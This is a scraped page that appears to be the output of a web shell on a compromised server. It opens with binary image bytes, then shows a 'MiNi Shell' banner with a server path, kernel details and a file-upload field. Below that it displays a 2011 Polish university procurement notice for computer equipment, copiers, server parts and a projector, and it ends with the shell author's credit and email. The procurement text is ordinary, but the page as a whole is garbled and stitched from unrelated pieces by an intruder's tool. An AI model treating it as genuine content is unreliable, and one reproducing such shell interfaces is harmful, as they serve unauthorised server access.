JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20111124/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20111124/394968-N-2011.html

<p class="kh_header"><b>Łódź: Dostawa sprzętu komputerowego dla Publicznego Liceum Ogólnokształcącego Politechniki Łódzkiej</b><br>
<b>Numer ogłoszenia: 394968 - 2011; data zamieszczenia: 24.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Politechnika Łódzka,  Zamówienia Publiczne , ul. Żeromskiego 116, 90-924 Łódź, woj. łódzkie, tel. 42 631 20 12, faks 42 631 21 04.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.zp.p.lodz.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu komputerowego dla Publicznego Liceum Ogólnokształcącego Politechniki Łódzkiej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa fabrycznie nowego sprzętu komputerowego.
2. Poniżej zostały określone minimalne parametry urządzeń, co oznacza, że można zaoferować urządzenia o wyższych parametrach jakościowo-wydajnościowych od żądanych przez Zamawiającego pod warunkiem spełnienia wszystkich określonych parametrów minimalnych. 

Część 1
Komputer - 20 zestawów
1. Płyta główna:
 - Zintegrowana karta sieciowa 1 GB
 - Zintegrowana karta dźwiękowa
 - Zintegrowana grafika (całkowicie w płycie głównej lub przy zastosowaniu odpowiedniego procesora)
 - Obsługa AHCI, Raid: 0, 1, 5, 10
 - Obsługa RAM DDR3 do 32GB do 1333MHz, 4 złącza.
 - Kontroler FireWire
 - Złącza zewnętrzne zintegrowane z płytą: 1xPS/2, DVI, D-sub, HDMI, DisplayPort, 2xUSB3, 4xUSB2, RJ-45, 1xeSATA, 1xFireWire
 - Złącza wewnętrzne:2xSATA 600,  4xSATA 300, 1xIDE, PCI Express (x16, x16), PCI Express (x16, x4), 1 x PCI Express (x1), 1 x PCI
 - Bios EFI
 - Obsługa systemu Windows 7
2. Procesor:
- Dwurdzeniowy
- Obsługa wirtualizacji rdzeni
- Częstotliwość taktowania minimum 3.3 GHz, 
- 3MB cache L3
- Wysokość testu wg strony www.cpubenchmark.net powyżej 4000
- Obsługa pamięci 1333 MHz
- Zintegrowana grafika jeśli jest potrzebna do współpracy z płytą główną
3. Pamięć: DDR3 2x4 GB, 1333MHz
4. HDD: 750 GB, 7200rpm, 64mb cache, NCQ, SATA 600
5. Napęd Optyczny:
- DVD+/-R 24x
- Interface SATA
- Możliwość pracy w pionie
- Obsługa lightscribe
- Dołączone oprogramowanie do nagrywania płyt
6. Obudowa
- Zasilacz 300W z aktywnym PFC
- Suma wymiarów obudowy (dł+szer+wys) nie może przekraczać  100 cm
- Szerokość obudowy nie może przekraczać 15 cm
- Możliwość pracy w pionie lub w poziomie
7. System operacyjny: 
- OEM Windows 7 Professional 64 bit
- Dołączony nośnik z systemem
8. Licencja Microsoft Windows Server CAL 2008 User MOLP EDU
9. Monitor:
- 22
- Rozdzielczość: 1680x1050
- Złącza: D-sub, DVI
- Przewód DVI do połączenia z komputerem
- Wbudowane głośniki
10. Klawiatura
- Bez dodatkowych przycisków (Power, Sleep itp.)
- Pomiędzy klawiaturą alfanumeryczną i numeryczną nad klawiszami strzałek ma znajdować się zespół klawiszy:
Insert	HomePageUP
DeleteEndPage Down
- Trzy letnia gwarancja producenta
11. Myszka: 
- Optyczna, 
- USB, 
- Dwa przyciski i rolka
- Trzy letnia gwarancja producenta
12. Gwarancja : 3 lata
13. Komponenty składowe muszą być ze sobą kompatybilne

Część 2
Kserokopiarka - 1 szt.
1. Wymagane funkcje: kopiarka, drukarka sieciowa, skaner sieciowy
2. Prędkość kopiowania 20 stron A4/min, 10 stron A3/min, 20 stron kolorowych A4/min
3. Technologia druku laserowa, kolorowa, czterobębnowa
4. Rozmiar oryginału A3
5. Rozmiar kopii A3-A6
6. Zoom 25-400%
7. Kopiowanie wielokrotne 1-999 kopii
8. Czas nagrzewania max 60s
9. Czas wydruki pierwszej strony kolorowej (max 14s), czarno-białej (max 11s)
10. Pobór mocy w czasie wydruku max 600W
11. Pamięć zainstalowana 1024 MB, możliwość rozbudowy do 2048 MB
12. Rozdzielczość druku 600x600 dpi
13. Zainstalowany Dupleks drukarki
14. Zainstalowany automatyczny, dwustronny podajnik oryginałów na min 50 arkuszy
15. Zainstalowany pełno kolorowy skaner sieciowy 40 ppm - kolor i mono( 300 dpi/A4)
16. Rozdzielczość skanowania: 600, 400, 300, 200, 400x200, 200x100 dpi
17. Skanowanie do e-mail, FTP, SMB, TWAIN, WSD, pamięci USB
18. Sanowanie do PDF, PDF/A, JPEG, TIFF, XPS
19. Wbudowana funkcja drukarki sieciowej pełno kolorowej z obsługą języka PCL 6 i PostScript Level 3, XPS
20. Druk bezpośredni plików PDF
21. Interface Ethernet RJ-45 10/100/1000BaseTX, USB 2.0, USB dla pamięci przenośnej
22. Kasety na papier 2x500 arkuszy, ręczny na 100 arkuszy o gramaturze do 256 g/m2
23. Panel obsługi wyposażony w kolorowy ekran dotykowy LCD z komunikatami w języku polskim
24. Stolik, podstawa jezdna - oryginalna (wyprodukowana przez producenta urządzenia)
25. Wydajność bębna 200.000 kolorowych stron A4
26. Wydajność tonera startowego min 15000 str. A4 czarno-białych lub 8000 str. A4 kolorowych przy 5% zaczernieniu strony
27. Tonery musza być nowe, nieużywane oraz wyprodukowane przez producenta oferowanego urządzenia

Część 3
Rozbudowa Serwera HP ProLiant ML150G6 o następujące elementy:
1. Wymiana standardowego zasilacza 460W na 2x750W.
2. Dołożenie klatki na 4 dyski HotSwap (w serwerze jest zamontowana karta HPSmart Array P410/256).
3. Dołożenie 2 x HDD 600GB 6G SAS 15K HotSwap.
4. Dołożenie 2 x HDD 2TB 6G SAS 7,2K HotSwap.
5. Dołożenie 12GB RAM w moduł ach 2GB, Advanced ECC, 1066MHz.
6. Dołożenie redundantnego wentylatora.
7. Dołożenie wymaganych elementów do wykonania powyższych rozbudów.
8. Zdementowane elementy (jeżeli wystąpią) pozostają u zamawiającego.
9. Do rozbudowy należy użyć elementów zalecanych przez producenta serwera.

Część 4
Laptop - 1 szt.
1. Procesor dwurdzeniowy 2,66MHz (z obsługą  wirtualizacji rdzeni). Wysokość testu wg strony www.cpubenchmark.net powyżej 2650
2. Matryca 14 1366x768 LED
3. Dysk twardy 320GB
4. RAM DDR3 2x2 GB 1066 MHZ z możliwością rozbudowy do 8GB
5. Sieć IEEE 802.11b/g/n oraz LAN 10/100/1000 RJ-45
6. Czytnik kart pamięci SDHC
7. Złącza VGA, e-sata, Display port
8. Zintegrowana kamera internetowa, mikrofon, głośniki
9. Wbudowany Touchpad
10. Waga nie przekraczająca 2,3 kg
11. Możliwość dołączenia drugiego akumulatora przedłużającego czas pracy laptopa bez zasilania sieciowego (2nd battery)
12. Możliwość dołączenia dedykowanej stacji dokującej (złącza LAN, DVI, VGA,  display port,  e-sata, USB i inne)
13. Możliwość jednoczesnego podłączenia stacji dokującej i drugiego akumulatora
14. System Operacyjny OEM Windows 7 Professional 64-bit lub równoważny(dołączony nośnik z systemem)

Część 5
Projektor multimedialny - 1 szt.
1. Rozdzielczość 1024x768 (XGA)
2. Jasność 4000 ANSI Lum. (3200 w trybie cichym)
3. Kontrast 2500:1
4. Poziom hałasu 34 dB w trybie normalnym i 29 dB w trybie cichym
5. Korekcja Keystone +/- 40 stopni
6. Żywotność lampy 2000 godz w trybie normalnym i 3000 godz w trybie cichym
7. Wbudowane głośniki
8. Pilot
9. Dołączony obiektyw
10. Zoom optyczny oraz cyfrowy
11. Złącza:
- 2x D-sub 15-pin
- 1xRCA (video)
- 1xS-Video
- 1xHDMI
- 1xRJ-45
- 2xRCA (audio)
- 1xRS232
12. Gwarancja producenta 2 lata


3. Miejsce dostawy: Publiczne Liceum Ogólnokształcące Politechniki Łódzkiej w Łodzi, al. Politechniki 6. 
4. Wykonawca zobowiązany jest do zapewnienia warunków gwarancji i serwisu oferowanego sprzętu. Serwis gwarancyjny odbywał się będzie w miejscu wskazanym w pkt 3. W przypadku konieczności naprawy sprzętu w innym miejscu, wysyłka sprzętu będzie dokonana na koszt i ryzyko Wykonawcy.
5. Odbiór przedmiotu zamówienia dokonany zostanie na podstawie protokołów zdawczo-odbiorczych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.21.30.00-5, 30.12.13.00-6, 48.82.00.00-2, 30.21.31.00-6, 38.65.21.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania przez Wykonawcę warunku posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania Zamawiający wymaga dołączenia do oferty oświadczenia o spełnianiu warunków udziału w postępowaniu złożonego na formularzu stanowiącym Załącznik nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania przez Wykonawcę warunku posiadania wiedzy i doświadczenia Zamawiający wymaga dołączenia do oferty oświadczenia o spełnianiu warunków udziału w postępowaniu złożonego na formularzu stanowiącym Załącznik nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania przez Wykonawcę warunku dysponowania odpowiednim potencjałem technicznym Zamawiający wymaga dołączenia do oferty oświadczenia o spełnianiu warunków udziału w postępowaniu złożonego na formularzu stanowiącym Załącznik nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania przez Wykonawcę warunku dysponowania odpowiednimi osobami zdolnymi do wykonania zamówienia Zamawiający wymaga dołączenia do oferty oświadczenia o spełnianiu warunków udziału w postępowaniu złożonego na formularzu stanowiącym Załącznik nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania przez Wykonawcę warunku znajdowania się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia Zamawiający wymaga dołączenia do oferty oświadczenia o spełnianiu warunków udziału w postępowaniu złożonego na formularzu stanowiącym Załącznik nr 3 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający działając w oparciu o art. 144 ust. 1 ustawy Prawo zamówień publicznych określa następujące okoliczności, które mogą powodować konieczność wprowadzenia zmian w treści zawartej umowy w stosunku do treści złożonej oferty: - zmiany terminu realizacji umowy - gdy zaistnieje inna, niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy zgodnie ze SIWZ; - zmiany stawki podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.zp.p.lodz.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Publiczne Liceum Ogólnokształcące Politechniki Łódzkiej w Łodzi, al. Politechniki 6, II piętro, Sekretariat, pokój 204..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.12.2011 godzina 16:00, miejsce: Publiczne Liceum Ogólnokształcące Politechniki Łódzkiej w Łodzi, al. Politechniki 6, II piętro, Sekretariat, pokój 204..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com